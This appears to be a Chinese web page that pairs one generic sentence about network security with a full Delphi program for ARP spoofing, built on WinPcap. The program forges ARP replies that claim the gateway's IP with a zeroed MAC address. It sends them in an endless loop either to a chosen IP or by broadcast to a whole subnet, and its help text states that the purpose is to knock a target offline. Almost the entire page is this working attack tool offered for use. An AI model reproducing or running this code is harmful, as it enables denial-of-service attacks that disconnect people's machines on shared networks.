随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。 program Arp; {$APPTYPE CONSOLE} uses windows,IpHlpApi, IpTypes, Packet32,WinSock,math; const MAC_SIZE = 6; type MACADDRESS = array[0 .. MAC_SIZE - 1] of UCHAR; type ETHERNET_HDR = packed record Destination: MACADDRESS; Source: MACADDRESS; Protocol: WORD; end; type ARP_HDR = packed record HardwareType: WORD; ProtocolType: WORD; HLen: UCHAR; PLen: UCHAR; Operation: WORD; SenderHA: MACADDRESS; SenderIP: DWORD; TargetHA: MACADDRESS; TargetIP: DWORD; end; type TSendData = Record HEther : ETHERNET_HDR; //以太网头 ARP : ARP_HDR; //ARP段 end; var NameList : Array [0..1024] of char; Buffer: array[0 .. 63] of Char; StrData:array[0..10] of string; BufferStr: String; NameLength,i:Longword; Num,Size: Integer; Strs:String; p:Padapter; pp:Ppacket ; Ch: Byte; IP: DWORD; Mac: MACADDRESS; Gateway: DWORD ; FComputerName,FComputerIP,CompIp,DestIP:string; SendData: TSendData; Ok:Boolean; Test:String; function IntToStr(I: DWORD): String; begin Str(I, Result); end; function StrPas(const Str: PChar): string; begin Result := Str; end; function StrToInt(const S: string): Integer; var E: Integer; begin Val(S, Result, E); end; function MactoStr(Mac: MACADDRESS): String; var ch1, ch2: Byte; i: Integer; begin Result := ''; for i := 0 to MAC_SIZE - 1 do begin ch1 := Mac[i] and $F0; ch1 := ch1 shr 4; if ch1 > 9 then ch1 := ch1 + Ord('A') - 10 else ch1 := ch1 + Ord('0'); ch2 := Mac[i] and $0F; if ch2 > 9 then ch2 := ch2 + Ord('A') - 10 else ch2 := ch2 + Ord('0'); Result := Result + Chr(ch1) + Chr(ch2); if i < 5 then Result := Result + ':'; end; end; function IPtoStr(IP: DWORD): String; begin result:=IntToStr((IP and $FF000000) shr 24 )+'.'; result:=result+IntToStr((IP and $00FF0000) shr 16 )+'.'; result:=result+IntToStr((IP and $0000FF00) shr 8 )+'.'; result:=Result+IntToStr((IP and $000000FF) shr 0 ); end; function Str2IP(s: String): DWORD; var i: Integer; Index: Integer; Digit: String; IP: array [0 .. 4 - 1] of DWORD; Len: Integer; begin //try Index := 1; for i := 0 to 4 - 1 do IP[i] := 0; Len := Length(s); for i := 0 to 4 - 1 do begin Digit := ''; while(s[Index] >= '0') and (s[Index] <= '9') and (Index <= Len) do begin Digit := Digit + s[Index]; inc(Index); end; inc(Index); IP[i] := StrToInt(Digit); end; Result := IP[0] shl 24 + IP[1] shl 16 + IP[2] shl 8 + IP[3] shl 0; // except // Result:=0; // end; end; function IntToHex( Value : DWord; Digits : Integer ) : String; asm // EAX = Value // EDX = Digits // ECX = @Result PUSH 0 ADD ESP, -0Ch PUSH EDI PUSH ECX LEA EDI, [ESP+8+0Fh] // EBX := @Buf[ 15 ] {$IFDEF SMALLEST_CODE} {$ELSE} AND EDX, $F {$ENDIF} @@loop: DEC EDI DEC EDX PUSH EAX {$IFDEF PARANOIA} DB $24, $0F {$ELSE} AND AL, 0Fh {$ENDIF} {$IFDEF oldcode} {$IFDEF PARANOIA} DB $3C, 9 {$ELSE} CMP AL, 9 {$ENDIF} JA @@10 {$IFDEF PARANOIA} DB $04, 30h-41h+0Ah {$ELSE} ADD AL,30h-41h+0Ah {$ENDIF} @@10: {$IFDEF PARANOIA} DB $04, 41h-0Ah {$ELSE} ADD AL,41h-0Ah {$ENDIF} {$ELSE newcode} AAM DB $D5, $11 //AAD ADD AL, $30 {$ENDIF newcode} //MOV byte ptr [EDI], AL STOSB DEC EDI POP EAX SHR EAX, 4 JNZ @@loop TEST EDX, EDX JG @@loop POP EAX // EAX = @Result MOV EDX, EDI // EDX = @resulting string CALL System.@LStrFromPChar POP EDI ADD ESP, 10h end; function StrToMac(s: String): MACADDRESS; var i: Integer; Index: Integer; Ch: String; Mac: MACADDRESS; begin Index := 1; for i := 0 to MAC_SIZE - 1 do begin Ch := Copy(s, Index, 2); Mac[i] := StrToInt('$' + Ch); inc(Index, 2); while s[Index] = ':' do inc(Index); end; Result := Mac; end; Function GetSubStrNum(aString:String;SepChar:String):integer; var i:Integer; StrLen:Integer; Num:Integer; begin StrLen:=Length(aString); Num:=0; For i:=1 to StrLen do If Copy(aString,i,1) = SepChar then Num:=Num+1; result:=Num; end; procedure GetClientPcNameIP; const nSize = 256; var strName :PChar; pWsaData :WSAData; nHostent :PHostEnt; Ver :Word; begin try Ver := MakeWord(2,0); if WSAStartup(Ver,pWsaData) <> 0 then exit; GetMem(strName,nSize); if GetHostName(strName,nSize) <> 0 then exit; FComputerName := strName; nHostent := GetHostByName(strName); FComputerIP := inet_ntoa((PInAddr((nHostent.h_addr_list)^))^); finally FreeMem(strName); end; end; function Split(Input: string; Deliminator: string; Index: Integer): string; var StringLoop, StringCount: Integer; Buffer: string; begin StringCount := 0; for StringLoop := 1 to Length(Input) do begin if (Copy(Input, StringLoop, 1) = Deliminator) then begin Inc(StringCount); if StringCount = Index then begin Result := Buffer; Exit; end else begin Buffer := ''; end; end else begin Buffer := Buffer + Copy(Input, StringLoop, 1); end; end; Result := Buffer; end; function GetMacByIP(Const IPAddr: string): string; var dwResult: DWord; nIPAddr: integer; nMacAddr: array[0..5] of Byte; nAddrLen: Cardinal; WSAData: TWSAData; begin if WSAStartup($101, WSAData)=-1 then Exit; nIPAddr := INet_Addr(PChar(IPAddr)); if nIPAddr = INADDR_NONE then exit; nAddrLen := 6; dwResult:= 1; try dwResult := SendARP(nIPAddr, 0, @nMacAddr, nAddrLen); except end; if dwResult = 0 then result := (IntToHex(nMacAddr[0], 2) + ':' + IntToHex(nMacAddr[1], 2) + ':' + IntToHex(nMacAddr[2], 2) + ':' + IntToHex(nMacAddr[3], 2) + ':' + IntToHex(nMacAddr[4], 2) + ':' + IntToHex(nMacAddr[5], 2)) else result := ''; WSACleanup; end; procedure MyNetwork(Ms: string;var IP: DWORD;var Mac: MACADDRESS;var Gateway: DWORD); var i: Integer; p, pAdapterInfo: PIP_ADAPTER_INFO; uOutBufLen: ULONG; dwRes: DWORD; begin pAdapterInfo := nil; uOutBufLen := 0; dwRes := GetAdaptersInfo(pAdapterInfo, uOutBufLen); if dwRes = ERROR_BUFFER_OVERFLOW then begin GetMem(pAdapterInfo, uOutBufLen); dwRes := GetAdaptersInfo(pAdapterInfo, uOutBufLen); end; if dwRes <> ERROR_SUCCESS then begin exit; end; p := pAdapterInfo; while p <> nil do begin if Pos(String(p^.AdapterName), Ms) <> 0 then break; p := p^.Next; end; try if p <> nil then begin IP := Str2IP(p^.IpAddressList.IpAddress.S); for i := 0 to MAC_SIZE - 1 do Mac[i] := p^.Address[i]; Gateway := Str2IP(p^.GatewayList.IpAddress.S); end; except end; FreeMem(pAdapterInfo); end; procedure Help; begin WriteLn('小小的程序.实验一下ARP欺骗.让个IP.让其断网罢了.运行环境需要Winpcap.作者:Open'); end; label start,print; begin Help ; NameLength := 1024; ZeroMemory(@NameList,1024); PacketGetAdapterNames(NameList,@NameLength); for i:=0 to NameLength-1 do begin if ((NameList[i]=#0) and (NameList[i+1]=#0))then break else if ((NameList[i]=#0) and (NameList[i+1]<>#0))then NameList[i]:=char(','); end; Strs:=StrPas(NameList); Num:=GetSubStrNum(Strs,','); GetClientPcNameIP; for i:=0 to Num do begin StrData[i]:= Split(Strs,',',i+1); MyNetwork (StrData[i],ip,mac,Gateway); CompIp:=iptostr(ip); if CompIp = FComputerIP then begin Strs:= StrData[i]; Break; end; end; WriteLn('Ethernet:'+strs); WriteLn('IP:'+iptostr(ip)); WriteLn('Mac:'+MacToStr(Mac)); WriteLn('Gateway:'+iptostr(Gateway)); WriteLn('1.攻击指定IP 2.攻击一个C段'); print: Write('请选择:'); Readln(Test); if (Test <> '1') and (Test <> '2' )then begin write('你的选择有误 '); goto print; end; ZeroMemory(@SendData,sizeof(TSendData)); if Test = '1' then begin start: write('请输入你要攻击的IP:'); Readln(DestIP); if GetSubStrNum(DestIP,'.')<>3 then begin WriteLn('输入不正确'); goto start ; end else begin SendData.HEther.Destination:= StrToMac(GetMacByIP(DESTIP) ); end ; end; if Test = '2' then SendData.HEther.Destination:= StrToMac('FF:FF:FF:FF:FF:FF') ; // ///SendData.HEther.Destination:= StrToMac(GetMacByIP(DESTIP) ); for i := 0 to MAC_SIZE - 1 do SendData.HEther.Source[i]:=30+Random(10)-1; SendData.HEther.Protocol:=$0608; SendData.ARP.HardwareType:=$0100; SendData.ARP.ProtocolType:=$08; SendData.ARP.HLen:=$06; SendData.ARP.PLen:=$04; SendData.ARP.Operation:=$0200; SendData.ARP.SenderHA:=StrToMac('00:00:00:00:00:00'); SendData.ARP.SenderIP:=inet_addr(PChar(iptostr(Gateway))); p:= PacketOpenAdapter(pchar(strs)); if (p=nil)or (p.hFile=INVALID_HANDLE_VALUE) then Exit; pp:=PacketAllocatePacket; PacketInitPacket(pp, @SendData,SizeOf(SendData)); if Test = '1' then begin WriteLn('正在对IP:' + DestIP + '进行ARP'); end else begin WriteLn('正在一个C段进行ARP'); end; OK:=True; while ok do begin PacketSendPacket(p, pp, true); if i >= 10 then begin Write('>'); i := 0 ; end; i := i + 1 ; Sleep(50); end; PacketFreePacket(pp); PacketCloseAdapter(p); end.